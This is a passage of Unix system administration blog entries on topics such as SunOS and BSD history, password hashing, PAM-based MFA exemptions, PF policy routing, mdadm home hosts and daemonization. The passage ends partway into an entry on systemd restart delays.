The Internet Archives has a variety of historical material from Sun Microsystems, including (some) documentation for both SunOS 2.0 and SunOS 3.0. This documentation makes it clear that the primary purpose of SIGWINCH was to tell graphical programs that their window (or one of them) had been changed, and they should repaint the window or otherwise refresh the contents (a program with multiple windows didn't get any indication of which window was damaged; the programming advice is to repaint them all). The SunOS 2.0 tgetent() termcap function will specifically update what it gives you with the current size of your window, but as far as I can tell there's no other documented support of getting window sizes; it's not mentioned in tty(4) or pty(4). Similar wording appears in the SunOS 3.0 Unix Interface Reference Manual.

(There are PDFs of some SunOS documentation online (eg), and up through SunOS 3.5 I can't find any mention of directly getting the 'window size'. In SunOS 4.0, we finally get a TIOCGWINSZ, documented in termio(4). However, I have access to SunOS 3.5 source, and it does have a TIOCGWINSZ ioctl, although that ioctl isn't documented. It's entirely likely that TIOCGWINSZ was added (well) before SunOS 3.5.)

According to this Git version of the original BSD development history, BSD itself added both SIGWINCH and TIOCGWINSZ at the end of 1984. The early SunOS had SIGWINCH and it may well have had TIOCGWINSZ as well, so it's possible that BSD got both from SunOS. It's also possible that early SunOS had a different (terminal) window size mechanism than TIOCGWINSZ, one more specific to their window system, and the UCB CSRG decided to create a more general mechanism that Sun then copied back by the time of SunOS 3.5 (possibly before the official release of 4.3 BSD, since I suspect everyone in the BSD world was talking to each other at that time).

PS: SunOS also appears to be the source of the mysteriously missing signal 29 in 4.3 BSD (mentioned in my entry on how old various Unix signals are). As described in the SunOS 3.4 sigvec() manual page, signal 29 is 'SIGLOST', "resource lost (see lockd(8C))". This appears to have been added at some point between the initial SunOS 3.0 release and SunOS 3.4, but I don't know exactly when.

Notes on the compatibility of crypted passwords across Unixes in late 2024

By: cks

For years now, all sorts of Unixes have been able to support better password 'encryption' schemes than the basic old crypt(3) salted-mutant-DES approach that Unix started with (these days it's usually called 'password hashing'). However, the support for specific alternate schemes varies from Unix to Unix, and has for many years. Back in 2010 I wrote some notes on the situation at the time; today I want to look at the situation again, since password hashing is on my mind right now.

The most useful resource for cross-Unix password hash compatibility is Wikipedia's comparison table. For Linux, support varies by distribution based on their choice of C library and what version of libxcrypt they use, and you can usually see a list in crypt(5), and pam_unix may not support using all of them for new passwords. For FreeBSD, their support is documented in crypt(3). In OpenBSD, this is documented in crypt(3) and crypt_newhash(3), although there isn't much to read since current OpenBSD only lists support for 'Blowfish', which for password hashing is also known as bcrypt. On Illumos, things are more or less documented in crypt(3), crypt.conf(5), and crypt_unix(7) and associated manual pages; the Illumos section 7 index provides one way to see what seems to be supported.

System administrators not infrequently wind up wanting cross-Unix compatibility of their local encrypted passwords. If you don't care about your shared passwords working on OpenBSD (or NetBSD), then the 'sha512' scheme is you best bet; it basically works everywhere these days. If you do need to include OpenBSD or NetBSD, you're stuck with bcrypt but even then there may be problems because bcrypt is actually several schemes, as Wikipedia covers.

Some recent Linux distributions seem to be switching to 'yescrypt' by default (including Debian, which means downstream distributions like Ubuntu have also switched). Yescrypt in Ubuntu is now old enough that it's probably safe to use in an all-Ubuntu environment, although your distance may vary if you have 18.04 or earlier systems. Yescrypt is not yet available in FreeBSD and may never be added to OpenBSD or NetBSD (my impression is that OpenBSD is not a fan of having lots of different password hashing algorithms and prefers to focus on one that they consider secure).

(Compared to my old entry, I no longer particularly care about the non-free Unixes, including macOS. Even Wikipedia doesn't bother trying to cover AIX. For our local situation, we may someday want to share passwords to FreeBSD machines, but we're very unlikely to care about sharing passwords to OpenBSD machines since we currently only use them in situations where having their own stand-alone passwords is a feature, not a bug.)

Pam_unix and your system's supported password algorithms

By: cks

The Linux login passwords that wind up in /etc/shadow can be encrypted (well, hashed) with a variety of algorithms, which you can find listed (and sort of documented) in places like Debian's crypt(5) manual page. Generally the choice of which algorithm is used to hash (new) passwords (for example, when people change them) is determined by an option to the pam_unix PAM module.

You might innocently think, as I did, that all of the algorithms your system supports will all be supported by pam_unix, or more exactly will all be available for new passwords (ie, what you or your distribution control with an option to pam_unix). It turns out that this is not the case some of the time (or if it is actually the case, the pam_unix manual page can be inaccurate). This is surprising because pam_unix is the thing that handles hashed passwords (both validating them and changing them), and you'd think its handling of them would be symmetric.

As I found out today, this isn't necessarily so. As documented in the Ubuntu 20.04 crypt(5) manual page, 20.04 supports yescrypt in crypt(3) (sadly Ubuntu's manual page URL doesn't seem to work). This means that the Ubuntu 20.04 pam_unix can (or should) be able to accept yescrypt hashed passwords. However, the Ubuntu 20.04 pam_unix(8) manual page doesn't list yescrypt as one of the available options for hashing new passwords. If you look only at the 20.04 pam_unix manual page, you might (incorrectly) assume that a 20.04 system can't deal with yescrypt based passwords at all.

At one level, this makes sense once you know that pam_unix and crypt(3) come from different packages and handle different parts of the work of checking existing Unix password and hashing new ones. Roughly speaking, pam_unix can delegate checking passwords to crypt(3) without having to care how they're hashed, but to hash a new password with a specific algorithm it has to know about the algorithm, have a specific PAM option added for it, and call some functions in the right way. It's quite possible for crypt(3) to get ahead of pam_unix for a new password hashing algorithm, like yescrypt.

(Since they're separate packages, pam_unix may not want to implement this for a new algorithm until a crypt(3) that supports it is at least released, and then pam_unix itself will need a new release. And I don't know if linux-pam can detect whether or not yescrypt is supported by crypt(3) at build time (or at runtime).)

PS: If you have an environment with a shared set of accounts and passwords (whether via LDAP or your own custom mechanism) and a mixture of Ubuntu versions (maybe also with other Linux distribution versions), you may want to be careful about using new password hashing schemes, even once it's supported by pam_unix on your main systems. The older some of your Linuxes are, the more you'll want to check their crypt(3) and crypt(5) manual pages carefully.

Linux's /dev/disk/by-id unfortunately often puts the transport in the name

By: cks

Filippo Valsorda ran into an issue that involved, in part, the naming of USB disk drives. To quote the relevant bit:

I can't quite get my head around the zfs import/export concept.

When I replace a drive I like to first resilver the new one as a USB drive, then swap it in. This changes the device name (even using by-id).

[...]

My first reaction was that something funny must be going on. My second reaction was to look at an actual /dev/disk/by-id with a USB disk, at which point I got a sinking feeling that I should have already recognized from a long time ago. If you look at your /dev/disk/by-id, you will mostly see names that start with things like 'ata-', 'scsi-OATA-', 'scsi-1ATA', and maybe 'usb-' (and perhaps 'nvme-', but that's a somewhat different kettle of fish). All of these names have the problem that they burn the transport (how you talk to the disk) into the /dev/disk/by-id, which is supposed to be a stable identifier for the disk as a standalone thing.

As Filippo Valsorda's case demonstrates, the problem is that some disks can move between transports. When this happens, the theoretically stable name of the disk changes; what was 'usb-' is now likely 'ata-' or vice versa, and in some cases other transformations may happen. Your attempt to use a stable name has failed and you will likely have problems.

Experimentally, there seem to be some /dev/disk/by-id names that are more stable. Some but not all of our disks have 'wwn-' names (one USB attached disk I can look at doesn't). Our Ubuntu based systems have 'scsi-<hex digits>' and 'scsi-SATA-<disk id>' names, but one of my Fedora systems with SATA drives has only the 'scsi-<hex>' names and the other one has neither. One system we have a USB disk on has no names for the disk other than 'usb-' ones. It seems clear that it's challenging at best to give general advice about how a random Linux user should pick truly stable /dev/disk/by-id names, especially if you have USB drives in the picture.

(See also Persistent block device naming in the Arch Wiki.)

This whole current situation seems less than ideal, to put it one way. It would be nice if disks (and partitions on them) had names that were as transport independent and usable as possible, especially since most disks have theoretically unique serial numbers and model names available (and if you're worried about cross-transport duplicates, you should already be at least as worried as duplicates within the same type of transport).

PS: You can find out what information udev knows about your disks with 'udevadm info --query=all --name=/dev/...' (from, via, by coincidence). The information for a SATA disk differs between my two Fedora machines (one of them has various SCSI_* and ID_SCSI* stuff and the other doesn't), but I can't see any obvious reason for this.

Using pam_access to sometimes not use another PAM module

By: cks

Suppose that you want to authenticate SSH logins to your Linux systems using some form of multi-factor authentication (MFA). The normal way to do this is to use 'password' authentication and then in the PAM stack for sshd, use both the regular PAM authentication module(s) of your system and an additional PAM module that requires your MFA (in another entry about this I used the module name pam_mfa). However, in your particular MFA environment it's been decided that you don't have to require MFA for logins from some of your other networks or systems, and you'd like to implement this.

Because your MFA happens through PAM and the details of this are opaque to OpenSSH's sshd, you can't directly implement skipping MFA through sshd configuration settings. If sshd winds up doing password based authentication at all, it will run your full PAM stack and that will challenge people for MFA. So you must implement sometimes skipping your MFA module in PAM itself. Fortunately there is a PAM module we can use for this, pam_access.

The usual way to use pam_access is to restrict or allow logins (possibly only some logins) based on things like the source address people are trying to log in from (in this, it's sort of a superset of the old tcpwrappers). How this works is configured through an access control file. We can (ab)use this basic matching in combination with the more advanced form of PAM controls to skip our PAM MFA module if pam_access matches something.

What we want looks like this:

auth  [success=1 default=ignore]  pam_access.so noaudit accessfile=/etc/security/access-nomfa.conf
auth  requisite  pam_mfa

Pam_access itself will 'succeed' as a PAM module if the result of processing our access-nomfa.conf file is positive. When this happens, we skip the next PAM module, which is our MFA module. If it 'fails', we ignore the result, and as part of ignoring the result we tell pam_access to not report failures.

Our access-nomfa.conf file will have things like:

# Everyone skips MFA for internal networks
+:ALL:192.168.0.0/16 127.0.0.1

# Insure we fail otherwise.
-:ALL:ALL

We list the networks we want to allow password logins without MFA from, and then we have to force everything else to fail. (If you leave this off, everything passes, either explicitly or implicitly.)

As covered in the access.conf manual page, you can get quite sophisticated here. For example, you could have people who always had to use MFA, even from internal machines. If they were all in a group called 'mustmfa', you might start with:

-:(mustmfa):ALL

If you get at all creative with your access-nomfa.conf, I strongly suggest writing a lot of comments to explain everything. Your future self will thank you.

Unfortunately but entirely reasonably, the information about the remote source of a login session doesn't pass through to later PAM authentication done by sudo and su commands that you do in the session. This means that you can't use pam_access to not give MFA challenges on su or sudo to people who are logged in from 'trusted' areas.

(As far as I can tell, the only information ``pam_access' gets about the 'origin' of a su is the TTY, which is generally not going to be useful. You can probably use this to not require MFA on su or sudo that are directly done from logins on the machine's physical console or serial console.)

Having an emergency backup DNS resolver with systemd-resolved

By: cks

At work we have a number of internal DNS resolvers, which you very much want to use to resolve DNS names if you're inside our networks for various reasons (including our split-horizon DNS setup). Purely internal DNS names aren't resolvable by the outside world at all, and some DNS names resolve differently. However, at the same time a lot of the host names that are very important to me are in our public DNS because they have public IPs (sort of for historical reasons), and so they can be properly resolved if you're using external DNS servers. This leaves me with a little bit of a paradox; on the one hand, my machines must resolve our DNS zones using our internal DNS servers, but on the other hand if our internal DNS servers aren't working for some reason (or my home machine can't reach them) it's very useful to still be able to resolve the DNS names of our servers, so I don't have to memorize their IP addresses.

A while back I switched to using systemd-resolved on my machines. Systemd-resolved has a number of interesting virtues, including that it has fast (and centralized) failover from one upstream DNS resolver to another. My systemd-resolved configuration is probably a bit unusual, in that I have a local resolver on my machines, so resolved's global DNS resolution goes to it and then I add a layer of (nominally) interface-specific DNS domain overrides that point to our internal DNS resolvers.

(This doesn't give me perfect DNS resolution, but it's more resilient and under my control than routing everything to our internal DNS resolvers, especially for my home machine.)

Somewhat recently, it occurred to me that I could deal with the problem of our internal DNS resolvers all being unavailable by adding '127.0.0.1' as an additional potential DNS server for my interface specific list of our domains. Obviously I put it at the end, where resolved won't normally use it. But with it there, if all of the other DNS servers are unavailable I can still try to resolve our public DNS names with my local DNS resolver, which will go out to the Internet to talk to various authoritative DNS servers for our zones.

The drawback with this emergency backup approach is that systemd-resolved will stick with whatever DNS server it's currently using unless that DNS server stops responding. So if resolved switches to 127.0.0.1 for our zones, it's going to keep using it even after the other DNS resolvers become available again. I'll have to notice that and manually fiddle with the interface specific DNS server list to remove 127.0.0.1, which would force resolved to switch to some other server.

(As far as I can tell, the current systemd-resolved correctly handles the situation where an interface says that '127.0.0.1' is the DNS resolver for it, and doesn't try to force queries to 127.0.0.1:53 to go out that interface. My early 2013 notes say that this sometimes didn't work, but I failed to write down the specific circumstances.)

Doing basic policy based routing on FreeBSD with PF rules

By: cks

Suppose, not hypothetically, that you have a FreeBSD machine that has two interfaces and these two interfaces are reached through different firewalls. You would like to ping both of the interfaces from your monitoring server because both of them matter for the machine's proper operation, but to make this work you need replies to your pings to be routed out the right interface on the FreeBSD machine. This is broadly known as policy based routing and is often complicated to set up. Fortunately FreeBSD's version of PF supports a basic version of this, although it's not well explained in the FreeBSD pf.conf manual page.

To make our FreeBSD machine reply properly to our monitoring machine's ICMP pings, or in general to its traffic, we need a stateful 'pass' rule with a 'reply-to':

B_IF="emX"
B_IP="10.x.x.x"
B_GW="10.x.x.254"
B_SUBNET="10.x.x.0/24"

pass in quick on $B_IF \
  reply-to ($B_IF $B_GW) \
  inet from ! $B_SUBNET to $B_IP \
  keep state

(Here $B_IP is the machine's IP on this second interface, and we also need the second interface, the gateway for the second interface's subnet, and the subnet itself.)

As I discovered, you must put the 'reply-to' where it is here, although as far as I can tell the FreeBSD pf.conf manual page will only tell you that if you read the full BNF. If you put it at the end the way you might read the text description, you will get only opaque syntax errors.

We must specifically exclude traffic from the subnet itself to us, because otherwise this rule will faithfully send replies to other machines on the same subnet off to the gateway, which either won't work well or won't work at all. You can restrict the PF rule more narrowly, for example 'from { IP1 IP2 IP3 }' if those are the only off-subnet IPs that are supposed to be talking to your secondary interface.

(You may also want to match only some ports here, unless you want to give all incoming traffic on that interface the ability to talk to everything on the machine. This may require several versions of this rule, basically sticking the 'reply-to ...' bit into every 'pass in quick on ...' rule you have for that interface.)

This PF rule only handles incoming connections (including implicit ones from ICMP and UDP traffic). If we want to be able to route our outgoing traffic over our secondary interface by selecting a source address when you do things, we need a second PF rule:

pass out quick \
  route-to ($B_IF $B_GW) \
  inet from $B_IP to ! $B_SUBNET \
  keep state

Again we must specifically exclude traffic to our local network, because otherwise it will go flying off to our gateway, and also you can be more specific if you only want this machine to be able to connect to certain things using this gateway and firewall (eg 'to { IP1 IP2 SUBNET3/24 }', or you could use a port-based restriction).

(The PF rule can't be qualified with 'on $B_IF', because the situation where you need this rule is where the packet would not normally be going out that interface. Using 'on <the interface with your default route's gateway>' has some subtle differences in the semantics if you have more than two interfaces.)

Although you might innocently think otherwise, the second rule by itself isn't sufficient to make incoming connections to the second interface work correctly. If you want both incoming and outgoing connections to work, you need both rules. Possibly it would work if you matched incoming traffic on $B_IF without keeping state.

A surprise with /etc/cron.daily, run-parts, and files with '.' in their name

By: cks

Linux distributions have a long standing general cron feature where there is are /etc/cron.hourly, /etc/cron.daily, and /etc/cron.weekly directories and if you put scripts in there, they will get run hourly, daily, or weekly (at some time set by the distribution). The actual running is generally implemented by a program called 'run-parts'. Since this is a standard Linux distribution feature, of course there is a single implementation of run-parts and its behavior is standardized, right?

Since I'm asking the question, you already know the answer: there are at least two different implementations of run-parts, and their behavior differs in at least one significant way (as well as several other probably less important ones).

In Debian, Ubuntu, and other Debian-derived distributions (and also I think Arch Linux), run-parts is a C program that is part of debianutils. In Fedora, Red Hat Enterprise Linux, and derived RPM-based distributions, run-parts is a shell script that's part of the crontabs package, which is part of cronie-cron. One somewhat unimportant way that these two versions differ is that the RPM version ignores some extensions that come from RPM packaging fun (you can see the current full list in the shell script code), while the Debian version only skips the Debian equivalents with a non-default option (and actually documents the behavior in the manual page).

A much more important difference is that the Debian version ignores files with a '.' in their name (this can be changed with a command line switch, but /etc/cron.daily and so on are not processed with this switch). As a non-hypothetical example, if you have a /etc/cron.daily/backup.sh script, a Debian based system will ignore this while a RHEL or Fedora based system will happily run it. If you are migrating a server from RHEL to Ubuntu, this may come as an unpleasant surprise, partly since the Debian version doesn't complain about skipping files.

(Whether or not the restriction could be said to be clearly documented in the Debian manual page is a matter of taste. Debian does clearly state the allowed characters, but it does not point out that '.', a not uncommon character, is explicitly not accepted by default.)

Linux software RAID and changing your system's hostname

By: cks

Today, I changed the hostname of an old Linux system (for reasons) and rebooted it. To my surprise, the system did not come up afterward, but instead got stuck in systemd's emergency mode for a chain of reasons that boiled down to there being no '/dev/md0'. Changing the hostname back to its old value and rebooting the system again caused it to come up fine. After some diagnostic work, I believe I understand what happened and how to work around it if it affects us in the future.

One of the issues that Linux RAID auto-assembly faces is the question of what it should call the assembled array. People want their RAID array names to stay fixed (so /dev/md0 is always /dev/md0), and so the name is part of the RAID array's metadata, but at the same time you have the problem of what happens if you connect up two sets of disks that both want to be 'md0'. Part of the answer is mdadm.conf, which can give arrays names based on their UUID. If your mdadm.conf says 'ARRAY /dev/md10 ... UUID=<x>' and mdadm finds a matching array, then in theory it can be confident you want that one to be /dev/md10 and it should rename anything else that claims to be /dev/md10.

However, suppose that your array is not specified in mdadm.conf. In that case, another software RAID array feature kicks in, which is that arrays can have a 'home host'. If the array is on its home host, it will get the name it claims it has, such as '/dev/md0'. Otherwise, well, let me quote from the 'Auto-Assembly' section of the mdadm manual page:

[...] Arrays which do not obviously belong to this host are given names that are expected not to conflict with anything local, and are started "read-auto" so that nothing is written to any device until the array is written to. i.e. automatic resync etc is delayed.

As is covered in the documentation for the '--homehost' option in the mdadm manual page, on modern 1.x superblock formats the home host is embedded into the name of the RAID array. You can see this with 'mdadm --detail', which can report things like:

Name : ubuntu-server:0
Name : <host>:25  (local to host <host>)

Both of these have a 'home host'; in the first case the home host is 'ubuntu-server', and in the second case the home host is the current machine's hostname. Well, its 'hostname' as far as mdadm is concerned, which can be set in part through mdadm.conf's 'HOMEHOST' directive. Let me repeat that, mdadm by default identifies home hosts by their hostname, not by any more stable identifier.

So if you change a machine's hostname and you have arrays not in your mdadm.conf with home hosts, their /dev/mdN device names will get changed when you reboot. This is what happened to me, as we hadn't added the array to the machine's mdadm.conf.

(Contrary to some ways to read the mdadm manual page, arrays are not renamed if they're in mdadm.conf. Otherwise we'd have noticed this a long time ago on our Ubuntu servers, where all of the arrays created in the installer have the home host of 'ubuntu-server', which is obviously not any machine's actual hostname.)

Setting the home host value to the machine's current hostname when an array is created is the mdadm default behavior, although you can turn this off with the right mdadm.conf HOMEHOST setting. You can also tell mdadm to consider all arrays to be on their home host, regardless of the home host embedded into their names.

(The latter is 'HOMEHOST <ignore>', the former by itself is 'HOMEHOST <none>', and it's currently valid to combine them both as 'HOMEHOST <ignore> <none>', although this isn't quite documented in the manual page.)

PS: Some uses of software RAID arrays won't care about their names. For example, if they're used for filesystems, and your /etc/fstab specifies the device of the filesystem using 'UUID=' or with '/dev/disk/by-id/md-uuid-...' (which seems to be common on Ubuntu).

PPS: For 1.x superblocks, the array name as a whole can only be 32 characters long, which obviously limits how long of a home host name you can have, especially since you need a ':' in there as well and an array number or the like. If you create a RAID array on a system with a too long hostname, the name of the resulting array will not be in the '<host>:<name>' format that creates an array with a home host; instead, mdadm will set the name of the RAID to the base name (either whatever name you specified, or the N of the 'mdN' device you told it to use).

(It turns out that I managed to do this by accident on my home desktop, which has a long fully qualified name, by creating an array with the name 'ssd root'. The combination turns out to be 33 characters long, so the RAID array just got the name 'ssd root' instead of '<host>:ssd root'.)

The history of inetd is more interesting than I expected

By: cks

Inetd is a traditional Unix 'super-server' that listens on multiple (IP) ports and runs programs in response to activity on them. When inetd listens on a port, it can act in two different modes. In the simplest mode, it starts a separate copy of the configured program for every connection (much like the traditional HTTP CGI model), which is an easy way to implement small, low volume services but usually not good for bigger, higher volume ones. The second mode is more like modern 'socket activation'; when a connection comes in, inetd starts your program and passes it the master socket, leaving it to you to keep accepting and processing connections until you exit.

(In inetd terminology, the first mode is 'nowait' and the second is 'wait'; this describes whether inetd immediate resumes listening on the socket for connections or waits until the program exits.)

Inetd turns out to have a more interesting history than I expected, and it's a history that's entwined with daemonization, especially with how the BSD r* commands daemonize themselves in 4.2 BSD. If you'd asked me before I started writing this entry, I'd have said that inetd was present in 4.2 BSD and was being used for various low-importance services. This turns out to be false in both respects. As far as I can tell, inetd was introduced in 4.3 BSD, and when it was introduced it was immediately put to use for important system daemons like rlogind, telnetd, ftpd, and so on, which were surprisingly run in the first style (with a copy of the relevant program started for each connection). You can see this in the 4.3 BSD /etc/inetd.conf, which has the various TCP daemons and lists them as 'nowait'.

(There are still network programs that are run as stand-alone daemons, per the 4.3 BSD /etc/rc and the 4.3 BSD /etc/rc.local. If we don't count syslogd, the standard 4.3 BSD tally seems to be rwhod, lpd, named, and sendmail.)

While I described inetd as having two modes and this is the modern state, the 4.3 BSD inetd(8) manual page says that only the 'start a copy of the program every time' mode ('nowait') is to be used for TCP programs like rlogind. I took a quick read over the 4.3 BSD inetd.c and it doesn't seem to outright reject a TCP service set up with 'wait', and the code looks like it might actually work with that. However, there's the warning in the manual page and there's no inetd.conf entry for a TCP service that is 'wait', so you'd be on your own.

The corollary of this is that in 4.3 BSD, programs like rlogind don't have the daemonization code that they did in 4.2 BSD. Instead, the 4.3 BSD rlogind.c shows that it can only be run under inetd or some equivalent, as rlogind immediately aborts if its standard input isn't a socket (and it expects the socket to be connected to some other end, which is true for the 'nowait' inetd mode but not how things would be for the 'wait' mode).

This 4.3 BSD inetd model seems to have rapidly propagated into BSD-derived systems like SunOS and Ultrix. I found traces that relatively early on, both of them had inherited the 4.3 style non-daemonizing rlogind and associated programs, along with an inetd-based setup for them. This is especially interesting for SunOS, because it was initially derived from 4.2 BSD (I'm less sure of Ultrix's origins, although I suspect it too started out as 4.2 BSD derived).

PS: I haven't looked to see if the various BSDs ever changed this mode of operation for rlogind et al, or if they carried the 'per connection' inetd based model all through until each of them removed the r* commands entirely.

OpenBSD kernel messages about memory conflicts on x86 machines

By: cks

Suppose you boot up an OpenBSD machine that you think may be having problems, and as part of this boot you look at the kernel messages for the first time in a while (or perhaps ever), and when doing so you see messages that look like this:

3:0:0: rom address conflict 0xfffc0000/0x40000
3:0:1: rom address conflict 0xfffc0000/0x40000

Or maybe the messages are like this:

memory map conflict 0xe00fd000/0x1000
memory map conflict 0xfe000000/0x11000
[...]
3:0:0: mem address conflict 0xfffc0000/0x40000
3:0:1: mem address conflict 0xfffc0000/0x40000

This sounds alarming, but there's almost certainly no actual problem, and if you check logs you'll likely find that you've been getting messages like this for as long as you've had OpenBSD on the machine.

The short version is that both of these are reports from OpenBSD that it's finding conflicts in the memory map information it is getting from your BIOS. The messages that start with 'X:Y:Z' are about PCI(e) device memory specifically, while the 'memory map conflict' errors are about the general memory map the BIOS hands the system.

Generally, OpenBSD will report additional information immediately after about what the PCI(e) devices in question are. Here are the full kernel messages around the 'rom address conflict':

pci3 at ppb2 bus 3
3:0:0: rom address conflict 0xfffc0000/0x40000
3:0:1: rom address conflict 0xfffc0000/0x40000
bge0 at pci3 dev 0 function 0 "Broadcom BCM5720" rev 0x00, BCM5720 A0 (0x5720000), APE firmware NCSI 1.4.14.0: msi, address 50:9a:4c:xx:xx:xx
brgphy0 at bge0 phy 1: BCM5720C 10/100/1000baseT PHY, rev. 0
bge1 at pci3 dev 0 function 1 "Broadcom BCM5720" rev 0x00, BCM5720 A0 (0x5720000), APE firmware NCSI 1.4.14.0: msi, address 50:9a:4c:xx:xx:xx
brgphy1 at bge1 phy 2: BCM5720C 10/100/1000baseT PHY, rev. 0

Here these are two network ports on the same PCIe device (more or less), so it's not terribly surprising that the same ROM is maybe being reused for both. I believe the two messages mean that both ROMs (at the same address) are conflicting with another unmentioned allocation. I'm not sure how you find out what the original allocation and device is that they're both conflicting with.

The PCI related messages come from sys/dev/pci/pci.c and in current OpenBSD come in a number of variations, depending on what sort of PCI address space is detected as in conflict in pci_reserve_resources(). Right now, I see 'mem address conflict', 'io address conflict', the already mentioned 'rom address conflict', 'bridge io address conflict', 'bridge mem address conflict' (in several spots in the code), and 'bridge bus conflict'. Interested parties can read the source for more because this exhausts my knowledge on the subject.

The 'memory map conflict' message comes from a different place; for most people it will come from sys/arch/amd64/pci/pci_machdep.c, in pci_init_extents(). If I'm understanding the code correctly, this is creating an initial set of reserved physical address space that PCI devices should not be using. It registers each piece of bios_memmap, which according to comments in sys/arch/amd64/amd64/machdep.c is "the memory map as the bios has returned it to us". I believe that a memory map conflict at this point says that two pieces of the BIOS memory map overlap each other (or one is entirely contained in the other).

I'm not sure it's correct to describe these messages as harmless. However, it's likely that they've been there for as long as your system's BIOS has been setting up its general memory map and the PCI devices as it has been, and you'd likely see the same address conflicts with another system (although Linux doesn't seem to complain about it; I don't know about FreeBSD).

Daemonization in Unix programs is probably about restarting programs

By: cks

It's standard for Unix daemon programs to 'daemonize' themselves when they start, completely detaching from how they were run; this behavior is quite old and these days it's somewhat controversial and sometimes considered undesirable. At this point you might ask why programs even daemonize themselves in the first place, and while I don't know for sure, I do have an opinion. My belief is that daemonization is because of restarting daemon programs, not starting them at boot.

During system boot, programs don't need to daemonize in order to start properly. The general Unix boot time environment has long been able to detach programs into the background (although the V7 /etc/rc didn't bother to do this with /etc/update and /etc/cron, the 4.2BSD /etc/rc did do this for the new BSD network daemons). In general, programs started at boot time don't need to worry that they will be inheriting things like stray file descriptors or a controlling terminal. It's the job of the overall boot time environment to insure that they start in a clean environment, and if there's a problem there you should fix it centrally, not make it every program's job to deal with the failure of your init and boot sequence.

However, init is not a service manager (not historically), which meant that for a long time, starting or restarting daemons after boot was entirely in your hands with no assistance from the system. Even if you remembered to restart a program as 'daemon &' so that it was backgrounded, the newly started program could inherit all sorts of things from your login session. It might have some random current directory, it might have stray file descriptors that were inherited from your shell or login environment, its standard input, output, and error would be connected to your terminal, and it would have a controlling terminal, leaving it exposed to various bad things happening to it when, for example, you logged out (which often would deliver a SIGHUP to it).

This is the sort of thing that even very old daemonization code deals with, which is to say that it fixes. The 4.2BSD daemonization code closes (stray) file descriptors and removes any controlling terminal the process may have, in addition to detaching itself from your shell (in case you forgot or didn't use the '&' when starting it). It's also easy to see how people writing Unix daemons might drift into adding this sort of code to them as people restarted the daemons (by hand) and ran into the various problems (cf). In fact the 4.2BSD code for it is conditional on 'DEBUG' not being defined; presumably if you were debugging, say, rlogind, you'd build a version that didn't detach itself on you so you could easily run it under a debugger or whatever.

It's a bit of a pity that 4.2 BSD and its successors didn't create a general 'daemonize' program that did all of this for you and then told people to restart daemons with 'daemonize <program>' instead of '<program>'. But we got the Unix that we have, not the Unix that we'd like to have, and Unixes did eventually grow various forms of service management that tried to encapsulate all of the things required to restart daemons in one place.

(Even then, I'm not sure that old System V init systems would properly daemonize something that you restarted through '/etc/init.d/<whatever> restart', or if it was up to the program to do things like close extra file descriptors and get rid of any controlling terminal.)

PS: Much later, people did write tools for this, such as daemonize. It's surprisingly handy to have such a program lying around for when you want or need it.

Traditionally, init on Unix was not a service manager as such

By: cks

Init (the process) has historically had a number of roles but, perhaps surprisingly, being a 'service manager' (or a 'daemon manager') was not one of them in traditional init systems. In V7 Unix and continuing on into traditional 4.x BSD, init (sort of) started various daemons by running /etc/rc, but its only 'supervision' was of getty processes for the console and (other) serial lines. There was no supervision or management of daemons or services, even in the overall init system (stretching beyond PID 1, init itself). To restart a service, you killed its process and then re-ran it somehow; getting even the command line arguments right was up to you.

(It's conventional to say that init started daemons during boot, even though technically there are some intermediate processes involved since /etc/rc is a shell script.)

The System V init had a more general /etc/inittab that could in theory handle more than getty processes, but in practice it wasn't used for managing anything more than them. The System V init system as a whole did have a concept of managing daemons and services, in the form of its multi-file /etc/rc.d structure, but stopping and restarting services was handled outside of the PID 1 init itself. To stop a service you directly ran its init.d script with 'whatever stop', and the script used various approaches to find the processes and get them to stop. Similarly, (re)starting a daemon was done directly by its init.d script, without PID 1 being involved.

As a whole system the overall System V init system was a significant improvement on the more basic BSD approach, but it (still) didn't have init itself doing any service supervision. In fact there was nothing that actively did service supervision even in the System V model. I'm not sure what the first system to do active service supervision was, but it may have been daemontools. Extending the init process itself to do daemon supervision has a somewhat controversial history; there are Unix systems that don't do this through PID 1, although doing a good job of it has clearly become one of the major jobs of the init system as a whole.

That init itself didn't do service or daemon management is, in my view, connected to the history of (process) daemonization. But that's another entry.

(There's also my entry on how init (and the init system as a whole) wound up as Unix's daemon manager.)

(Unix) daemonization turns out to be quite old

By: cks

In the Unix context, 'daemonization' means a program that totally detaches itself from how it was started. It was once very common and popular, but with modern init systems they're often no longer considered to be all that good an idea. I have some views on the history here, but today I'm going to confine myself to a much smaller subject, which is that in Unix, daemonization goes back much further than I expected. Some form of daemonization dates to Research Unix V5 or earlier, and an almost complete version appears in network daemons in 4.2 BSD.

As far back as Research Unix V5 (from 1974), /etc/rc is starting /etc/update (which does a periodic sync()) without explicitly backgrounding it. This is the giveaway sign that 'update' itself forks and exits in the parent, the initial version of daemonization, and indeed that's what we find in update.s (it wasn't yet a C program). The V6 update is still in assembler, but now the V6 update.s is clearly not just forking but also closing file descriptors 0, 1, and 2.

In the V7 /etc/rc, the new /etc/cron is also started without being explicitly put into the background. The V7 update.c seems to be a straight translation into C, but the V7 cron.d has a more elaborate version of daemonization. V7 cron forks, chdir's to /, does some odd things with standard input, output, and error, ignores some signals, and then starts doing cron things. This is pretty close to what you'd do in modern daemonization.

The first 'network daemons' appeared around the time of 4.2 BSD. The 4.2BSD /etc/rc explicitly backgrounds all of the r* daemons when it starts them, which in theory means they could have skipped having any daemonization code. In practice, rlogind.c, rshd.c, rexecd.c, and rwhod.c all have essentially identical code to do daemonization. The rlogind.c version is:

#ifndef DEBUG
	if (fork())
		exit(0);
	for (f = 0; f < 10; f++)
		(void) close(f);
	(void) open("/", 0);
	(void) dup2(0, 1);
	(void) dup2(0, 2);
	{ int tt = open("/dev/tty", 2);
	  if (tt > 0) {
		ioctl(tt, TIOCNOTTY, 0);
		close(tt);
	  }
	}
#endif

This forks with the parent exiting (detaching the child from the process hierarchy), then the child closes any (low-numbered) file descriptors it may have inherited, sets up non-working standard input, output, and error, and detaches itself from any controlling terminal before starting to do rlogind's real work. This is pretty close to the modern version of daemonization.

(Today, the ioctl() stuff is done by calling setsid() and you'd probably want to close more than the first ten file descriptors, although that's still a non-trivial problem.)

Resetting the backoff restart delay for a systemd service

By: cks

Suppose, not hypothetically, that your Linux machine is your DSL PPPoE gateway, and you run the PPPoE software through a simple script to invoke pppd that's run as a systemd .service unit. Pppd itself will exit if the link fails for some reason, but generally you want to automatically try to establish it again. One way to do this (the simple way) is to set the systemd unit to 'Restart=always', with a restart delay.

